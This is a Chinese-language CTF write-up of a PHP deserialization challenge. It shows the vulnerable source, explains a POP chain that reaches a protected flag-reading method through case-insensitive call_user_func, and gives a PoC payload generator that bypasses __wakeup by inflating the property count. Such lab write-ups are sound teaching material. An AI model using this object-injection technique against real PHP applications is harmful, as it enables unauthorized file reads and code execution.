成都理工平台的一道反序列化
源码如下
<?php
highlight_file(__FILE__);
class A
{
public $a;
private $b;
protected $c;
public function __construct($a, $b, $c)
{
$this->a = $a;
$this->b = $b;
$this->c = $c;
}
protected function flag()
{
echo file_get_contents('/flag');
}
public function __call($name, $arguments)
{
call_user_func([$name, $arguments[0]]);
}
public function __destruct()
{
return 'this a:' . $this->a;
}
public function __wakeup()
{
$this->a = 1;
$this->b = 2;
$this->c = 3;
}
}
class B
{
public $a;
private $b;
protected $c;
public function __construct($a, $b, $c)
{
$this->a = $a;
$this->b = $b;
$this->c = $c;
}
public function b()
{
echo $this->b;
}
public function __toString()
{
$this->a->a($this->b);
return 'this is B';
}
}
if (isset($_GET['str']))
unserialize($_GET['str']);
分析下代码
最后肯定是要回到flag函数的
先找入口,destruct可以执行$this->a,a是可控的
那就可以触发B类的toString方法
如果控制B类中的a为new A,那么就会调用A类中一个不存在的方法,触发__call,而控制参数$this->b为flag就可以通过call_user_func回调flag函数
但是这里指定的是a,而非A
不过call_user_func这个函数是不区分大小写的,又是因为是个数组,所以相当于回调了A类里面的flag函数
但是这里并没有完,我们在反序列化时还要过滤__wakeup方法
poc:
<?php
class A
{
public $a;
private $b;
protected $c;
}
class B
{
public $a;
private $b;
protected $c;
public function __construct()
{
$this->b='flag';
}
}
$t=new A();
$s=new B();
$s->a=$t;
$t->a=$s;
$p=serialize($t);
$p=str_replace('A":3','A":4',$p);
echo $p;
echo '</br>';
echo urlencode($p);
这题的链子其实一下就看到了,主要是这个call_user_func不区分大小写在这里记录一下
|